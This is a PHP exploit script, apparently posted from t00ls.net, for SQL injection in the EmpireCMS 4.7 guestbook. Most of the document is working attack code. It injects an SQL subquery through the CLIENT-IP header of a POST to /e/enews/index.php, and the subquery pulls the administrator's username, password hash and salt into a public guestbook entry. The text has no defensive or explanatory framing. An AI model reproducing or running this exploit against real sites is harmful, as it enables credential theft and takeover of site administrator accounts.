۹EmpireCMS47 sql inject Exploit

1.<?php2.print_r("3.+------------------------------------------------------------------+4.Exploit For EmpireCMS475.Just work as php>=5&mysql>=4.16.BY t00ls.net7.+------------------------------------------------------------------+8.");9. 10.if ($argc<3) {11.echo "Usage: php ".$argv[0]." host path \n";12.echo "host: target server \n";13.echo "path: path to EmpireCMS47\n";14.echo "Example:\r\n";15.echo "php ".$argv[0]." localhost /\n";16.die;17.}18.$host=$argv[1];19.$path=$argv[2];20.$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";21.$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where 22. 23.userid=1),'',1,'1111',0,0,'')/*";24.$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";25.$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";26.$message .= "Accept-Language: zh-cn\r\n";27.$message .= "Content-Type: application/x-www-form-urlencoded\r\n";28.$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";29.$message .= "CLIENT-IP: $cmd\r\n";30.$message .= "Host: $host\r\n";31.$message .= "Content-Length: ".strlen($data)."\r\n";32.$message .= "Cookie: ecmsgbookbid=1;\r\n";33.$message .= "Connection: Close\r\n";34.$message .= "\r\n";35.$message .=$data;36.$ock=fsockopen($host,80);37.if (!$ock) {38.echo 'No response from '.$host;39.die;40.}41.echo "[+]connected to the site!\r\n";42.echo "[+]sending data now\r\n";43.fputs($ock,$message);44.@$resp ='';45.while ($ock && !feof($ock))46.$resp .= fread($ock, 1024);47.echo $resp;48.echo "[+]done!\r\n";49.echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck"50.?>